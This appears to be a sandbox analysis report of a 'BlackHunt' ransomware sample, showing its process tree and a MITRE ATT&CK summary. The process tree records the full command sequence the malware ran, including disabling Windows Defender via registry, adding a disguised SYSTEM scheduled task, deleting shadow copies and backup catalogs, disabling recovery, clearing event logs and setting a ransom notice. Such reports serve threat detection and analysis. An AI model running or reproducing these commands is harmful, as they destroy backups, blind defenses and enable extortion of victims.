C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f2⤵
- Suspicious use of WriteProcessMemory
PID:5064 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f3⤵PID:4900
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f2⤵
- Suspicious use of WriteProcessMemory
PID:3732 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f3⤵
- Modifies Windows Defender Real-time Protection settings
PID:1368
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f2⤵
- Suspicious use of WriteProcessMemory
PID:2452 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f3⤵PID:396
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Low" /t REG_DWORD /d 6 /f2⤵
- Suspicious use of WriteProcessMemory
PID:2740 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Low" /t REG_DWORD /d 6 /f3⤵PID:3556
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t REG_DWORD /d 1 /f2⤵
- Suspicious use of WriteProcessMemory
PID:1792 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t REG_DWORD /d 1 /f3⤵PID:3972
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Medium" /t REG_DWORD /d 6 /f2⤵
- Suspicious use of WriteProcessMemory
PID:4972 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Medium" /t REG_DWORD /d 6 /f3⤵PID:1256
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "High" /t REG_DWORD /d 6 /f2⤵
- Suspicious use of WriteProcessMemory
PID:2556 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "High" /t REG_DWORD /d 6 /f3⤵PID:4904
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f2⤵
- Suspicious use of WriteProcessMemory
PID:2260 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f3⤵PID:3780
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d 1 /f2⤵PID:3068
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d 1 /f3⤵PID:1584
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f2⤵PID:2224
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f3⤵PID:2192
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "StartMenuLogOff" /t REG_DWORD /d 1 /f2⤵PID:2436
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "StartMenuLogOff" /t REG_DWORD /d 1 /f3⤵PID:1936
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f2⤵PID:1352
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f3⤵PID:920
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoLogoff" /t REG_DWORD /d 1 /f2⤵PID:5116
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoLogoff" /t REG_DWORD /d 1 /f3⤵PID:3576
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f2⤵PID:4692
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f3⤵PID:4656
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f2⤵PID:3784
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f3⤵PID:1844
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f2⤵PID:2948
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f3⤵PID:4812
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f2⤵PID:4860
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f3⤵PID:2212
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WinRE" /v "DisableSetup" /t REG_DWORD /d 1 /f2⤵PID:4956
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WinRE" /v "DisableSetup" /t REG_DWORD /d 1 /f3⤵PID:2428
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupLauncher" /t REG_DWORD /d 1 /f2⤵PID:2444
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupLauncher" /t REG_DWORD /d 1 /f3⤵PID:3728
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableRestoreUI" /t REG_DWORD /d 1 /f2⤵PID:3252
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableRestoreUI" /t REG_DWORD /d 1 /f3⤵PID:4628
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableSystemBackupUI" /t REG_DWORD /d 1 /f2⤵PID:4440
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableSystemBackupUI" /t REG_DWORD /d 1 /f3⤵PID:2636
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupUI" /t REG_DWORD /d 1 /f2⤵PID:4004
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupUI" /t REG_DWORD /d 1 /f3⤵PID:4472
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f2⤵PID:4140
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f3⤵PID:4072
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c SCHTASKS.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "Windows Critical Update" /TR "C:\Users\Admin\AppData\Local\Temp\8ac43b85cd27b405fabf9188706f9f33c97fecd2459b4ce70ccede9c2dfb681f.exe" /F2⤵
- Modifies registry class
PID:4340 -
C:\Windows\system32\schtasks.exeSCHTASKS.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "Windows Critical Update" /TR "C:\Users\Admin\AppData\Local\Temp\8ac43b85cd27b405fabf9188706f9f33c97fecd2459b4ce70ccede9c2dfb681f.exe" /F3⤵
- Creates scheduled task(s)
PID:4288
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 1 /f2⤵PID:2144
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 1 /f3⤵PID:2172
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded2⤵PID:1768
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
- Suspicious use of WriteProcessMemory
PID:1648
-
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded3⤵
- Interacts with shadow copies
PID:4844
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB2⤵PID:2116
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:1456
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB2⤵PID:3916
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB3⤵
- Interacts with shadow copies
PID:7240
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded2⤵PID:1728
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded3⤵
- Interacts with shadow copies
PID:10076
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /all /quiet2⤵PID:4312
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet3⤵
- Interacts with shadow copies
PID:7332
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} bootstatuspolicy IgnoreAllFailures2⤵PID:2184
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy IgnoreAllFailures3⤵
- Modifies boot configuration data using bcdedit
PID:7576
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil.exe usn deletejournal /D C:2⤵PID:4616
-
C:\Windows\system32\fsutil.exefsutil.exe usn deletejournal /D C:3⤵
- Deletes NTFS Change Journal
PID:7592
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable2⤵PID:2288
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable3⤵PID:7392
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wbadmin.exe delete catalog -quiet2⤵PID:2496
-
C:\Windows\system32\wbadmin.exewbadmin.exe delete catalog -quiet3⤵
- Deletes backup catalog
PID:7548
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} recoveryenabled No2⤵PID:1696
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled No3⤵
- Modifies boot configuration data using bcdedit
PID:7636
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D M:\2⤵PID:8356
-
C:\Windows\system32\fsutil.exefsutil usn deletejournal /D M:\3⤵
- Enumerates connected drives
PID:11480
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D C:\2⤵PID:6540
-
C:\Windows\system32\fsutil.exefsutil usn deletejournal /D C:\3⤵PID:8312
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl System2⤵PID:6136
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl System3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:8968
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Security /e:false2⤵PID:6356
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Security /e:false3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:9780
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} recoveryenabled No2⤵PID:5776
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled No3⤵
- Modifies boot configuration data using bcdedit
PID:7768
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil.exe usn deletejournal /D C:2⤵PID:10444
-
C:\Windows\system32\fsutil.exefsutil.exe usn deletejournal /D C:3⤵
- Deletes NTFS Change Journal
PID:13780
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 0 /f2⤵PID:11976
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 0 /f3⤵PID:8216
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\ProgramData\#BlackHunt_ReadMe.hta2⤵
- Checks computer location settings
- Modifies registry class
PID:7648 -
C:\Windows\SysWOW64\mshta.exe"C:\Windows\SysWOW64\mshta.exe" "C:\ProgramData\#BlackHunt_ReadMe.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}3⤵PID:6896
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6896 -s 13604⤵
- Program crash
PID:2408
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 5 > nul & del "C:\Users\Admin\AppData\Local\Temp\8ac43b85cd27b405fabf9188706f9f33c97fecd2459b4ce70ccede9c2dfb681f.exe"2⤵PID:11848
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 53⤵
- Runs ping.exe
PID:944
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c notepad.exe C:\ProgramData\#BlackHunt_ReadMe.txt2⤵PID:8648
-
C:\Windows\system32\notepad.exenotepad.exe C:\ProgramData\#BlackHunt_ReadMe.txt3⤵PID:11100
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /IM mshta.exe /f2⤵PID:7068
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 0 /f2⤵PID:6868
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c SCHTASKS.exe /Delete /TN "Windows Critical Update" /F2⤵PID:12280
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticetext" /t REG_SZ /d " Your Network Infected With BlackHunt Ransomware Team. ALL Your important Files Encrypted and Stolen , Do You Want Your Files? read [ReadMe] Files carefully and contact us by [[email protected]] AND [[email protected]] " /f2⤵PID:7292
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticecaption" /t REG_SZ /d "WARNING WARNING WARNING. " /f2⤵PID:5252
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable2⤵PID:8176
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wbadmin.exe delete catalog -quiet2⤵PID:2156
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} bootstatuspolicy IgnoreAllFailures2⤵PID:8180
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /all /quiet2⤵PID:11572
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Security2⤵PID:11476
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Application2⤵PID:8404
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Setup2⤵PID:11492
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D F:\2⤵PID:10584
-
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV11⤵
- Modifies registry class
PID:3280
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1560
-
C:\Windows\system32\wbengine.exe"C:\Windows\system32\wbengine.exe"1⤵
- Suspicious use of AdjustPrivilegeToken
PID:12972
-
C:\Windows\System32\vdsldr.exeC:\Windows\System32\vdsldr.exe -Embedding1⤵PID:15872
-
C:\Windows\System32\vds.exeC:\Windows\System32\vds.exe1⤵
- Checks SCSI registry key(s)
PID:8724
-
C:\Windows\System32\WaaSMedicAgent.exeC:\Windows\System32\WaaSMedicAgent.exe e3decf77ea829a33e4bd13811690e11b dFVSYjBU5UKQYNwMQNBoqA.0.1.0.0.01⤵
- Enumerates connected drives
PID:4844
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Setup1⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:9212
-
C:\Windows\system32\wbadmin.exewbadmin.exe delete catalog -quiet1⤵
- Deletes backup catalog
PID:8016
-
C:\Windows\system32\reg.exeREG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticecaption" /t REG_SZ /d "WARNING WARNING WARNING. " /f1⤵PID:4056
-
C:\Windows\system32\reg.exeREG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticetext" /t REG_SZ /d " Your Network Infected With BlackHunt Ransomware Team. ALL Your important Files Encrypted and Stolen , Do You Want Your Files? read [ReadMe] Files carefully and contact us by [[email protected]] AND [[email protected]] " /f1⤵PID:8636
-
C:\Windows\system32\taskkill.exetaskkill /IM mshta.exe /f1⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:11092
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 0 /f1⤵PID:9436
-
C:\Windows\system32\schtasks.exeSCHTASKS.exe /Delete /TN "Windows Critical Update" /F1⤵PID:9616
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable1⤵PID:10896
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 460 -p 6896 -ip 68961⤵PID:6840
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy IgnoreAllFailures1⤵
- Modifies boot configuration data using bcdedit
PID:8396
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet1⤵
- Interacts with shadow copies
PID:11704
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Security1⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:7848
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Application1⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:11604
-
C:\Windows\system32\fsutil.exefsutil usn deletejournal /D F:\1⤵
- Enumerates connected drives
PID:7712
Network
MITRE ATT&CK Enterprise v15
Persistence
- Boot or Logon Autostart Execution (1)
  - Registry Run Keys / Startup Folder (1)
- Create or Modify System Process (1)
  - Windows Service (1)
- Scheduled Task/Job (1)
Privilege Escalation
- Abuse Elevation Control Mechanism (1)
  - Bypass User Account Control (1)
- Boot or Logon Autostart Execution (1)
  - Registry Run Keys / Startup Folder (1)
- Create or Modify System Process (1)
  - Windows Service (1)
- Scheduled Task/Job (1)
Defense Evasion
- Abuse Elevation Control Mechanism (1)
  - Bypass User Account Control (1)
- Impair Defenses (2)
  - Disable or Modify Tools (2)
- Indicator Removal (4)
  - File Deletion (3)
- Modify Registry (5)
Downloads